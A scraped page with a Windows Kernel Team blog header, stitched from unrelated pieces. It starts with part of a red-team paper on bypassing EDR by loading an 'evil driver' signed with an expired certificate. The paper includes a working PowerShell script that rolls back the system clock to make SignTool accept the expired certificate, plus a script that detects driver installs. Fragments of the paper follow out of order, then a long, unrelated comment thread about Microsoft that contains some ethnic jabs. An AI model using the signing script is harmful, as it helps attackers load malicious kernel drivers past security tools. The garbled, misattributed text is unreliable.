Welcome to Windows Kernel Team Blog. Hari Pulapaka. Published Sep 27.

So that leaves finding an existing certificate.
After going down a long rabbit hole, I discovered a community that is already familiar with exploiting existing drivers and creating their own: video game cheat developers. To my surprise, they face a problem set very similar to ours, with anti-cheat engines playing the role that EDR plays for us.
Anti-cheat engines for video games work much like EDRs in function. To get around them, cheat developers will also either load their own driver or exploit a vulnerable existing driver to disable the engine's functionality, exactly what we want to do with EDR.
Before we continue, I would like to emphasize that I do not encourage using the following techniques for malicious purposes such as unauthorized hacking or cheating in online games.
This is simply a proof of concept of how these techniques could be abused, for use only in an environment you have permission to test in. Looking at the certificate, it was even issued before the July 29th cutoff date, the date after which Windows 10 stops accepting kernel drivers signed with newly issued cross-signed certificates.
As long as the certificate was valid at some point, Windows will still load a driver signed with it. This may change in the future, but for now it is allowed. Microsoft's SignTool can sign a driver with such a certificate plus the appropriate cross-certificate, which chains the certificate's issuing CA up to the Microsoft root that the kernel's code integrity check trusts. Using the certificate and cross-certificate together, we can sign our evil driver. Trying this, we hit a small issue.
SignTool reports that no certificates meet all the given criteria. Remember, the certificate expired back in November. It turns out we can pull some trickery with the system time: SignTool checks the certificate's validity period against the current clock, so moving the clock back into the window in which the certificate was valid lets the signing succeed, and the kernel does not care that the certificate has since expired. With the driver signed and loaded, running our corresponding user-mode client, evilcli, shows it talking to the driver. To show the correlation between the application and the driver, below is what happens when you run the application without starting the driver.
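The clock trick as a script, added here as an example; it is not the paper's own code. The paths, the PFX password, the driver name and the assumption that signtool.exe is on the PATH are all made up for the example, and the cross-certificate must be the one Microsoft issued for the certificate's CA. Run it elevated.

```powershell
# Added example, not from the original paper. Signs a driver with an expired
# code-signing certificate by rolling the system clock back into the
# certificate's validity window while SignTool runs, then restoring it.
# All paths, the PFX password and the driver name below are assumptions.
$Pfx       = 'C:\sign\legacy.pfx'      # expired cert + private key (assumed)
$PfxPass   = 'changeme'                # assumed PFX password
$CrossCert = 'C:\sign\cross.cer'       # Microsoft cross-cert for the cert's CA (assumed)
$Driver    = 'C:\sign\evildrv.sys'     # driver to sign (assumed)
$SignTool  = 'signtool.exe'            # assumed to be on PATH (Windows SDK)

# Inspect the certificate first: SignTool refuses a certificate that is not
# valid "now", which is the "no certificates met the criteria" error.
$cert = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new($Pfx, $PfxPass)
'Subject : {0}' -f $cert.Subject
'Valid   : {0:u} .. {1:u}' -f $cert.NotBefore, $cert.NotAfter
if ($cert.NotAfter -gt (Get-Date)) { 'Certificate is still valid; no clock change needed.' }

# Pick a moment one day before expiry, safely inside the validity window.
$signingTime = $cert.NotAfter.AddDays(-1)
$realStart   = Get-Date
try {
    # Pause time sync so it cannot correct the clock while we are signing.
    Stop-Service w32time -ErrorAction SilentlyContinue
    Set-Date -Date $signingTime | Out-Null

    # /ac attaches the cross-certificate so the chain reaches the Microsoft
    # root that kernel Code Integrity trusts. No /t or /tr: a timestamp
    # authority would stamp the real date, which lies after expiry.
    & $SignTool sign /v /ac $CrossCert /f $Pfx /p $PfxPass /fd sha256 $Driver
    if ($LASTEXITCODE -ne 0) { throw "signtool exited with code $LASTEXITCODE" }
}
finally {
    # Restore the clock: real start time plus however long signing took.
    $elapsed = (Get-Date) - $signingTime
    Set-Date -Date ($realStart + $elapsed) | Out-Null
    Start-Service w32time -ErrorAction SilentlyContinue
}

# User-mode Authenticode checks are clock-aware, so expect a validity-period
# complaint here rather than 'Valid'. That check is not what decides whether
# the kernel loads the driver: Code Integrity accepts an expired signer unless
# the certificate carries the Lifetime Signing EKU.
$sig = Get-AuthenticodeSignature -FilePath $Driver
'Status  : {0} ({1})' -f $sig.Status, $sig.StatusMessage
'Signer  : {0}' -f $sig.SignerCertificate.Subject
```

The clock is restored in a finally block so a failed SignTool run does not leave the host with a stale date, and time synchronisation is stopped first because a sync in the middle of the run would move the clock forward and reproduce the original error.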
Generally speaking, antivirus and other security appliances do not scrutinize drivers as heavily as user applications; drivers are treated with significantly more trust. Because of this, virus signatures are probably not the most reliable way to detect malicious drivers. In addition, many EDRs implement no anti-tampering measures to check whether their kernel callbacks have been zeroed out or changed.
The likely reason is that, running in the kernel, they do not want the overhead of the additional CPU cycles that continuous re-checking would cost. What I did find is that the Windows System event log records when a new driver service is installed (Service Control Manager event 7045), which is a usable signal for driver loads. This may not be a perfect detection, as there are edge cases. Below is an installation of the Npcap packet driver that comes with Wireshark installations.
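The detection side, as an added example rather than the paper's own code. It assumes the System-log record the paper refers to is Service Control Manager event 7045 ("A service was installed in the system"), which is what a driver installed through the SCM produces; it keeps only kernel-mode driver services and flags those whose image sits outside the normal driver directories or whose signature does not verify. The three sample events are constructed for the example: the first is modelled on an Npcap install, the other two are invented.

```powershell
# Added example, not from the original paper. Lists kernel-driver installs
# recorded in the System log by the Service Control Manager (event 7045,
# "A service was installed in the system") and flags the suspicious ones.

function Get-DriverInstallEvents {
    # Live query; returns one object per 7045 event with its EventData fields.
    param([int]$MaxEvents = 500)
    $filter = @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
    ForEach-Object {
        $data = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time        = $_.TimeCreated
            ServiceName = $data['ServiceName']
            ImagePath   = $data['ImagePath']
            ServiceType = $data['ServiceType']   # 'kernel mode driver' / 'user mode service'
            StartType   = $data['StartType']
        }
    }
}

function Test-DriverInstall {
    # Returns $null for non-driver services; otherwise the event plus the
    # reasons it looks suspicious (an empty list means nothing odd was found).
    param(
        [Parameter(Mandatory)] $Event,
        [switch] $SkipFileCheck          # for offline samples with no file on disk
    )
    if ($Event.ServiceType -ne 'kernel mode driver') { return $null }

    # The SCM stores the path as handed to CreateService: '\??\C:\x.sys',
    # '\SystemRoot\system32\drivers\x.sys' or 'system32\drivers\x.sys'.
    $path = $Event.ImagePath -replace '^\\\?\?\\', '' -replace '^\\SystemRoot\\', "$env:SystemRoot\"
    if ($path -notmatch '^[A-Za-z]:\\') { $path = Join-Path $env:SystemRoot $path }

    $reasons = @()
    $trusted = @("$env:SystemRoot\System32\drivers\*", "$env:SystemRoot\System32\DriverStore\*")
    if (-not ($trusted | Where-Object { $path -like $_ })) {
        $reasons += "image outside the driver directories: $path"
    }
    if (-not $SkipFileCheck) {
        if (Test-Path -LiteralPath $path) {
            $sig = Get-AuthenticodeSignature -LiteralPath $path
            if ($sig.Status -ne 'Valid') { $reasons += "signature status $($sig.Status)" }
            elseif ($sig.SignerCertificate.NotAfter -lt (Get-Date)) {
                $reasons += "signer certificate expired $($sig.SignerCertificate.NotAfter.ToString('u'))"
            }
        } else { $reasons += 'image no longer on disk' }
    }
    [pscustomobject]@{
        Time = $Event.Time; Service = $Event.ServiceName; Image = $path
        Suspicious = ($reasons.Count -gt 0); Reasons = ($reasons -join '; ')
    }
}

# Constructed sample events (not real log data) so the logic runs offline:
# the first is modelled on an Npcap install, the other two are invented.
$samples = @(
    [pscustomobject]@{ Time='2023-01-10 09:12:00'; ServiceName='npcap'
        ImagePath='\SystemRoot\system32\DRIVERS\npcap.sys'; ServiceType='kernel mode driver'; StartType='auto start' }
    [pscustomobject]@{ Time='2023-01-10 09:13:00'; ServiceName='evildrv'
        ImagePath='\??\C:\Users\Public\evildrv.sys'; ServiceType='kernel mode driver'; StartType='demand start' }
    [pscustomobject]@{ Time='2023-01-10 09:14:00'; ServiceName='UpdateSvc'
        ImagePath='C:\Program Files\Vendor\svc.exe'; ServiceType='user mode service'; StartType='auto start' }
)
$samples | ForEach-Object { Test-DriverInstall $_ -SkipFileCheck } | Format-Table -AutoSize

# Against the live log on a real host:
# Get-DriverInstallEvents | ForEach-Object { Test-DriverInstall $_ } | Where-Object Suspicious | Format-Table -AutoSize
```

On the samples, npcap passes (its path normalises into System32\drivers) and evildrv is flagged for living under C:\Users\Public; the user-mode service is skipped. Two of the edge cases the paper alludes to are visible in the logic: event 7045 fires only when the service is created, so a driver that is loaded again from an existing service entry, or loaded via NtLoadDriver from a registry key written by hand, leaves no 7045 record at all, and an attacker who can clear the System log removes the evidence after the fact.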
Preface
The techniques that will be discussed in this paper were not discovered by myself. This technique was made popular by Marcello Salvati, a red team

In certain environments, controls such as firewalls are in place that restrict outbound ports and protocols. For example, maybe only web traffic over ports
Many times, they

Zach Stein, Security Consultant

Acknowledgements
My understanding of EDRs would not be possible without the help of many great security researchers.
- Just avoid them: if a host has EDR, move on to a host where the appliance is not installed, or proxy traffic through the host so as not to execute commands on the system.
- Stick to the gray area: blend in with typical network traffic. These actions may be slightly suspicious, but keep a low enough profile that human eyes are needed to analyze further.
- Operate in the blind spots: stick to those techniques which may not be logged.
What is an EDR?
Below are some common EDR vendors you may know.

PatchGuard (see Microsoft's documentation)
Back in the day (the x86 Windows XP days and before), the hardware divide between user land and kernel land existed, but nothing enforced it from inside the kernel: any loaded driver could patch kernel code and data structures such as the system call table, which is exactly how rootkits of that era hid themselves. PatchGuard (Kernel Patch Protection), introduced with 64-bit Windows, periodically checks those structures and bug-checks the machine if it finds them modified.
How Do Processes Interact with the Kernel?
Applications request kernel services through system calls. This way, the application is able to use kernel functionality without actually modifying or running in the kernel's memory space.

Windows Drivers
There are situations where an application needs to access protected data in the kernel. Typically, a tool that needs this functionality is split into two parts:
- User-mode component (application): runs in user mode and presents the user interface.
- Kernel-mode component (driver): runs in kernel mode and performs the privileged work on the application's behalf.
Vasyl wrote: 15 years of MS-only technology experience ended for me 2 years ago when I read the Android developers guide.
The ideas behind it seemed powerful as nothing else. The JS Ecma5 standard astonished my imagination with the ideas and possibilities behind it. Seeing Microsoft out of these innovations, I gave it up. New ideas rule the world and me. Solely for this reason, slavery is abolished from this planet. If you want people to be motivated, the blame game and guilt therapy are a pretty bad tool.

I guess you must be one of those who stayed back in MS because you could not make it to Google. How does THAT feel, for the sake of balance? When a company loses an experienced expert with irreplaceable domain knowledge, replace them with a new college grad. The organization takes an enormous hit in every technical respect, but you save a lot of money. And since all of your competitors are already doing it, you will have aggressive business types winning all the arguments when it comes time for budgeting.
Society has already decided that every productivity increase brought about by technology and computers will benefit the business exclusively, with none of their benefits being shared with the employee. If productivity doubles, profit doubles, workload doubles, and compensation remains stagnant. Bill Pytlovany wrote: I worked in Blvd 42 in the early-mid 90's and I can't imagine having kids working on campus.
I hadn't heard that phrase before but I run into a lot of young programmers who were never taught some of the basics. My direct report was a fantastic mentor.
Besides our code, he also focused on our build environment. Everyone had the same version of Visual Studios and during a product cycle he wouldn't allow any updates or changes. He understood, as I have always taught, just changing the text of a string could affect your compiled code in ways you'd never imagine. I also occasionally participated in new employee interviews. The focus was always how someone thought more than what kind of education they had.
Thanks for reporting this comment and thanks to the gentleman who posted. It really is interesting to hear and picture how things work behind the scenes.

JPH wrote: I have a feeling that the "follow up" is damage control and was not written by the author of the original post.

JPH wrote: It's worth pointing out as well that the "follow up" is written in an entirely different style of verbatim. The vocabulary, structure, word frequencies, and the form and structure of the prose are all different.
I'm almost certain that the author is not the same person.

Ken wrote: Guys: Keep in mind that there's a billion Chinese out there training to take our jobs at half the pay. You may talk about family balance and whatnot, but you better have your retirement plans lined up. Be valuable or be gone. The truth is, Microsoft is a has-been. Their years of monopoly have created enough inertia that they appear healthy but it's pretty much over.
As they say, "a big one like this can keep running around for years after you chop off the head."

If the government had more control, there would be more technically competent people in key positions in the industry and we wouldn't have these problems and we would have more jobs for undocumented immigrants too.

In this case, does that imply the original author had been identified within Microsoft and someone at MS had impersonated him to post the follow up through the same channel?
Looks like one more developer is going to leave MS soon.

Ken wrote: This post by mrb is nothing more than a rant by someone looking for their 15 minutes of fame. Windows 8 is a flop and they don't have a clue how to compete with Android. Notice I didn't mention Apple. You people don't seem to see what's happening. What would government control fix?
How are they going to provide more technical individuals? The hacker factory? The awesome education that public universities produce? The kids graduating public high school that can tell you who Pauly D is but not Stephen Hawking? The government is not the answer for anything, they aren't the smartest people in the room, they aren't even the smartest people in the neighborhood. Those people work at google according to this article.
When the iPhone was first released, it really showed computers could be packed in small devices and sold to a lot more users. Computers were starting to become stagnant, and the market needed something new to revitalize the computing industry. I don't say, with such wide interest of disorganized developers, linux whole gnu has the best utility software, but they are just enough for these new companies to come up with a solution and start improving them constantly once they are up and running.
Moreover, google is creating their possible employees by funding and engaging with free software e. Microsoft is pretty much stagnant in that respect. Companies with big money do good, but companies with big money and great software do even better. Another problem for Microsoft is, Linux is the most widely deployed software on the planet. It might currently not be as competitive on PCs, but just like, if I buy a Sony TV and like it, it is most probable I will buy a Sony music system, even if Philips has a great product most consumers do.
Apart from PCs and mobiles, Linux is becoming pretty much a standard; even on mobile it has a large presence. Even if Linux has problems on some parts, as the author suggested, big companies know what advantage they have going with a free operating system. Today they are among the top 10 contributors to the Linux kernel. Just in the past 2 years, Linux utility software has undergone tremendous improvements, even on the desktop and graphics side, and everyone knows how fast the kernel moves.
Microsoft has been bitten by its own actions. They pretty much slandered open source and never could embrace it. On the other hand Apple uses so much free software and is doing pretty good. Microsoft plays by fear, and fear is not good for business. Things are changing, but if Microsoft does not open up, and change their business model to a more open source model, even if google, facebook, amazon, Apple die away there will be 20 more companies competing with Microsoft.
So the real question is, how long can they afford?

Big Kate wrote: Can I just say thanks for reposting. I came here via slashdot, I hope the OP is OK and hasn't had any consequences for posting what they did. Personally it's a huge insight into why things don't happen as effectively as they might. What they describe is classic Big Corporation culture v.
The emphasis in big corporations on not messing up the product leads to that spreading to the entire tree. I can also understand why, if you've been hacking code inside the org for years and it feels like you're not getting anywhere, you will want to grumble and mention the stuff that is P-ing you off. I'm in other areas of development and I don't know anything about the technical issues they speak about. I can accept Microsoft has created great products, it eats its own dog food as a matter of course and it's good to know that under it all MS8 is good and I hope that Blue gets us a better UI option.
Having said that, this ThinkPad is running a Debian variant; it has Win7 in a box that I occasionally load to do stuff that is utterly locked into the Windows environment.
Most of the devs I know have long abandoned MS and have either gone to Linux or in a corporate space — Mac because they have to have a machine bought with an OS and they get a choice of Apple or Microsoft.
I suspect when Apple finally gives up on professional development environments and becomes a pure-play consumer product company they will switch to Linux as well. So to both the OP and the person whose blog I am reading can I say thanks. Thanks again 12 May UTC.

Today you are able to do everything on the big distros without any knowledge of the operating system or anything.
Only the names of the applications differ. It is not even Windows itself that keeps most users locked to Microsoft. The applications are. And those business decisions also affect the dev process. And that for many years. In a big company like MS reverting such bad influences can take really long.

Big Kate wrote: one thing I forgot to say is that Microsoft seem to have spent the last 10 years being run by people with no vision.
There are technical leads in areas who create great products - which I own, such as the (I have 4 of them). But it feels like Microsoft management fires them and then it just slides from there. Personally I blame Steve Ballmer - at least Bill Gates was willing to bet the farm to face out new opposition.
Oh and btw I won't be buying the Durango - why? Because Linux gaming is finally taking off with Steam Box etc. It took a long while for GL and CL to catch up but they have and it's where things are happening. Oh and I hate the Windows 8 UI I am forced to use with the and it looks like Microsoft has decided to copy Apple again as far as a consumer unit, and I hate the assumption of: lock in, lock down, yes please!

Tex Pepper wrote: This piece reinforces what I've believed to be true of Microsoft for some time now: the company is like a huge, rudderless ship.
A ship which is now running aground - and the crew know it, too - some of them, at least - but nobody knows what to do about it or can't do anything, because she has grown so large for so long now that her momentum makes it impossible to change course. Perhaps the crew have tried to call the Bridge. I'm sure they have, but no-one is answering.
No one's there. The Bridge is empty. She has a Board of Directors, but no Navigator. A Management team, but no Helmsman. Momentum, but no Destination and, unless Microsoft does something very drastic to change her course very soon, she'll run aground.
It may already be too late. Microsoft really is very, very much like the Titanic, metaphorically speaking. That ship's designers also thought they had created something unsinkable; they also handed it off to a captain who drove her at top speed, blind, in the dark. Will Microsoft share Titanic's fate? The company has always struck me as being a bit out-of-touch with its customers but, now, like some gigantic whale swimming in the shallows, she is in grave danger of being beached by the outgoing tide.
Even now she can't keep up. She is falling farther and farther behind whilst the smaller and more agile fish head out to sea. For my part I won't feel at all sorry to see Microsoft go away, but I will feel sorry for people like that bloke inside the company, trapped inside a system he would change if only he could.
I hope he and the others there like him get out in plenty of time. Let 'em drown.

He was in a completely different state of mind when writing the follow-up: ranting when writing the 1st time, anxious when writing the 2nd time. Personally I have some strong technical background with Windows from about years ago. While having touched Linux for the first time in the late 90s, I'm now almost Linux-only. Every time I have to sit at a naked Windows box I feel somehow lost. Linux comes along with all these nifty tools installed by default, and almost everything that's not can be fetched from a repository in seconds.
Windows is a pain. That's my view of using Windows as a development platform, granted I love the ease of using command line tools. And I'm really happy that my company has Linux desktops for the developers. I can almost feel the pain of these vendors and their users, having spent years on knowledge about Windows, .NET and the like. Seeing this mess now, unsure if or how long. For me the period where WinFS and trusted computing were the hot topics around ? MS failed on some really expensive projects back then I think.
The introduction of SDLC in order to improve security was the right step, but all these efforts are pretty hidden; they don't improve user experience. Obviously this was the time when Apple stepped back in and brought up completely "new" UI experiences. Maybe this post is high-profile enough that it also reaches devs and managers in other SW companies, and gives some very important impulses.
I think what is described here for MSFT is reality in many other companies, and holds back innovation and improvement in a huge part of the industry.

Somebody wrote: Speaking as an employee of another large software company that has read and occasionally even written rants similar to the original, the followup made me somewhat sad that it was necessary.
I realize we live in a world where people who don't know anything about how large software systems are maintained hang on every word written by the people behind the curtain, but almost everything he said in the followup seemed obvious to me. And so on. To the anonymous writer, whoever you are, I'd just like to say congratulations on a wonderful rant.
I'd definitely subscribe to your newsletter. What makes me wonder is what will happen to the endless number of Windows installations that we have to deal with as a part of our everyday lives. If the company does actually tank, what will happen to the kiosks, POS machines, schools, libraries, computer gaming?
I'd like to think that Linux would be graciously adopted - and Valve seem pretty eager to make that happen - but I'm cautious.

David wrote: I have issues with big companies in general, but very specific ones with MS in particular. I've been working as a hardware engineer for many years and can't describe the pain I had supporting Windows with regard to their completely broken and absolutely brain-dead USB stack and audio implementation.
IOW: we were forced to ship uncompliant devices for users of all platforms because some people in Seattle had no clue what they were doing, over years and years, across many incarnations of the broken heap they're selling. On a different note, I used to build large-scale mail systems some years ago, and the exact same kind of hell broke loose in that area too.
We constantly had to fix up after one of the biggest software companies in the world, which broke every single bit they even remotely touched, and then actively tried to prevent me from understanding what the fuck is going on by not letting me have a look at their buggy implementation.
That's actually my biggest complaint here: It's ok to make mistakes. They just happen. What matters is their stinking ignorance, their fear of re-doing things for the sake of improvement, their resistance to learn, and their idea of intellectual property which does not allow you to understand the actual problem. Long story short: I'm done with them. I don't care why they don't scale, and how they compare themselves to others. I want them to vanish completely, the sooner the better.
And I want companies to not bother anymore. Stop shipping Windows drivers for your hardware, it's worthless. Stop selling software for their platform. It's a pain in the ass to get the OS running anyway. Hopefully, Wine (Windows application support in Linux) will improve so legacy Windows apps can run until they are replaced.

I've seen the NTFS code, and it's scary. It's too fragile. The original NT team had more than its fair share of genius-level engineers, from Cutler on down.
They could get away with creating the ugliness that is NTFS. I have far less faith in the subsequent maintainers.

Dell, HP, Lenovo, etc. Large corporations with volume license and enterprise agreements are also MS's customers. MS doesn't always do what they want, but there is an active dialog between MS and their direct customers.

John Doe wrote: One more thought. I know this completely pisses off the old school purists (a group I'm often accused of belonging to), but the fact is that performance only matters when it falls below some acceptable level.
Once you reach "acceptability", it becomes harder to justify putting effort into small incremental improvements. No company has infinite resources, even MS. The explosion of battery powered devices (phones and tablets) has changed the calculus, but only so much. One of the stated technical reasons (and the only one I find even remotely plausible) for needing the new WinRT API is improved battery life vs.
Windows 8 shows that trying to optimize for performance can alienate your existing customers who don't perceive performance as a problem.

I worked in several big companies like HP, ATT and I see that they are moving very slowly in their technology development and infrastructure quality, performance. To sum up, from a long-term point of view I see the future in little commercial or non-commercial companies.

Anonymous wrote: Steve Ballmer is here.

Nietzsche wrote: There are some people who treat their coding time as a job; they can be used to do the boring tasks like updating documentation.

To get this, I had to take my laptop to a Samsung repair centre where an engineer kept it for 7 days and examined it to make sure that I don't use Windows 8 on the laptop. No matter what the amount, I'm not going to pay for a product I don't want or use.
Had Samsung not agreed to refund me, I would have returned the unit for a refund even though OS-free or pre-installed Linux laptops here in the UK are slim pickin's. Using the latest nVidia binary. For some reason, nVidia are unable to vsync on both monitors in a dual-monitor configuration. While it "works", the quality and user experience are rubbish.
A simple thing, like dragging a window around, becomes jerky and stuttery. This problem is much worse if you're dragging a window that's hugging the top of the desktop. This does not occur with the Intel HD. This is one perfect example of why "open" trumps "closed". The nVidia drivers are proprietary (closed) while the Intel HD drivers are open.
The difference between running a Linux well, the Unity desktop on both is like night and day. Everything works beautifully and smoothly on the HD and it's much more responsive , even though it can't push as many pixels as the TI. The future is in open, not closed.
Steve wrote: Liked the article. Unfortunately (again, in my own personal experience), most people doing just the basic minimum 9-to-5 are these kinds of people.
Everyone seems to assume the author is male and the majority of posters seem really stressed. Go for a surf.

Steve wrote: I noticed Windows performance decrease when Microsoft introduced "superfetch", AKA disk-to-memory caching that thrashed the hard disk to put programs in memory which the user might require. All because "we wanted to use up all available RAM", akin to wanting to use up all hard disk space.